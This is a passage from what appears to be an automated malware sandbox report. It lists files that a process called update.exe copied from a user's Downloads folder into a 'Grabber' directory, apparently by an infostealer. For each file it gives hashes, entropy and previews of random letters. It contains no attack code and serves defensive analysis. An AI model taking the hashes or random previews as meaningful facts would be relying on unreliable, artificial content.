                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
